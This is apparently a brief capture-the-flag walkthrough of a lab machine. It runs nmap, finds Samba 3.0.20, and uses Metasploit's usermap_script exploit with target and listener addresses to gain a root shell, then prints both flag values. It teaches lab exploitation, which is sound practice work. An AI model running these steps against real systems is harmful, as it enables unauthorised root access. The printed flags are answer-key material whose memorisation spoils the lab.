Enumeration
As usual, let's start with nmap
nmap -sV -sC 10.10.10.3
This tells us to use -Pn. Let's try:
nmap -sV -sC -Pn 10.10.10.3
nmap tells us that port 445 is open which is associated with Samba and the version is samba 3.0.20
Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.
Let's load Metasploit using:
msfconsole
search samba 3.0.20
use exploit/multi/samba/usermap_script
show options
We need to set up both RHOSTS and LHOST
set RHOSTS 10.10.10.3
10.10.10.3 is the IP of the target machine
set LHOST 10.10.14.12
LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different
exploit
It worked! We got a shell on the target machine now.
whoami
we are root!
ls
cd home
ls
cd makis
ls
cat user.tx
856c4e7468499c31b63029bec549af33
Congratulations! You got the user flag!
Now let's look for the root flag
cd /root
cat user.txt
cat root.txt
674dfcc1c188d43df6664b6fa8ab3a35
Congratulations! You got the root flag!
Comments